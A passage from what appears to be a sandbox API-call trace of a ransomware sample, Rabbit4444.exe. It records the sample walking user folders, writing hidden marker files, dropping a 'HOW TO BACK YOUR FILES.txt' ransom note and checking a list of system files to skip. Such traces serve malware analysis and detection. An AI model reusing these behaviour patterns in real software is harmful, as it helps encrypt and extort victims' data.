cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.995] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0063.995] lstrcpyW (in: lpString1=0x130ec12, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.995] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\S0\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localstate\\files\\s0\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x278 [0063.996] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0063.996] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.996] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.997] CloseHandle (hObject=0x2c8) returned 1 [0063.997] CloseHandle (hObject=0x278) returned 1 [0063.997] GetCurrentThreadId () returned 0xd98 [0063.997] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222a8 [0063.997] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache" [0063.997] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116930 | out: hHeap=0xe0000) returned 1 [0063.997] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222a0 | out: hHeap=0xe0000) returned 1 [0063.997] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache" [0063.997] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache\\" [0063.997] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" [0063.997] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0063.998] WriteFile (in: hFile=0x278, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.000] FlushFileBuffers (hFile=0x278) returned 1 [0064.001] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.001] CloseHandle (hObject=0x278) returned 1 [0064.002] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache") returned 99 [0064.002] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.002] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd18c2664, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef784aec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0064.002] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.002] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.002] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.002] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.002] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd18c2664, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef784aec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.002] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.002] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.002] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.002] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.002] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.002] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef784aec, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef784aec, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef784aec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.002] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.002] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.002] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef784aec, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef784aec, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef784aec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.002] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0064.002] lstrcpyW (in: lpString1=0x130ec00, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.002] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x278 [0064.003] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0064.003] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.003] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.003] CloseHandle (hObject=0x2c8) returned 1 [0064.003] CloseHandle (hObject=0x278) returned 1 [0064.003] GetCurrentThreadId () returned 0xd98 [0064.003] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222e8 [0064.004] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData" [0064.004] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116860 | out: hHeap=0xe0000) returned 1 [0064.004] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222e0 | out: hHeap=0xe0000) returned 1 [0064.004] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData" [0064.004] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData\\" [0064.004] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" [0064.004] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0064.005] WriteFile (in: hFile=0x278, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.008] FlushFileBuffers (hFile=0x278) returned 1 [0064.009] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.009] CloseHandle (hObject=0x278) returned 1 [0064.010] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData") returned 96 [0064.010] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.010] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd18c1e3b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef784aec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0064.010] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.010] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.010] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.010] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.010] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd18c1e3b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef784aec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.010] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.010] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.010] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.010] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.010] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.010] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef784aec, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef784aec, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef7aacdc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.010] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.010] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.010] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef784aec, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef784aec, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef7aacdc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.010] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0064.010] lstrcpyW (in: lpString1=0x130ebfa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.010] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x278 [0064.011] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0064.022] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.023] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.023] CloseHandle (hObject=0x2c8) returned 1 [0064.023] CloseHandle (hObject=0x278) returned 1 [0064.023] GetCurrentThreadId () returned 0xd98 [0064.023] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122268 [0064.023] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC" [0064.023] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122cc0 | out: hHeap=0xe0000) returned 1 [0064.023] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0064.023] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC" [0064.023] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\" [0064.023] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" [0064.023] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0064.026] WriteFile (in: hFile=0x278, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.036] FlushFileBuffers (hFile=0x278) returned 1 [0064.038] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.038] CloseHandle (hObject=0x278) returned 1 [0064.038] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC") returned 91 [0064.038] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.038] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe3e55cfc, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x384e8f13, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xef7d104a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0064.039] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.039] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.039] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.039] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.039] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe3e55cfc, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x384e8f13, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xef7d104a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.039] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.039] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.039] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.039] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.039] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.039] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef7d104a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef7d104a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef7d104a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.039] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.039] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.039] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5106299e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1870a2f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5106299e, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BackgroundTransferApi", cAlternateFileName="BACKGR~1")) returned 1 [0064.039] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.039] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.039] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2="Rabbit4444.exe") returned -1 [0064.039] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2=".") returned 1 [0064.039] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2="..") returned 1 [0064.039] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2="windows") returned -1 [0064.039] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2="bootmgr") returned -1 [0064.039] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2="pagefile.sys") returned -1 [0064.039] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2="boot") returned -1 [0064.039] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2="ids.txt") returned -1 [0064.039] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2="NTUSER.DAT") returned -1 [0064.039] lstrcpyW (in: lpString1=0x130ebf0, lpString2="BackgroundTransferApi" | out: lpString1="BackgroundTransferApi") returned="BackgroundTransferApi" [0064.039] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222a0 [0064.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xe4) returned 0x117378 [0064.040] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222a8 | out: ListHead=0xf68b0, ListEntry=0x1222a8) returned 0x122028 [0064.040] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xe3e7bf5e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd187150f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe3e7bf5e, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0064.040] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.040] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.040] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned 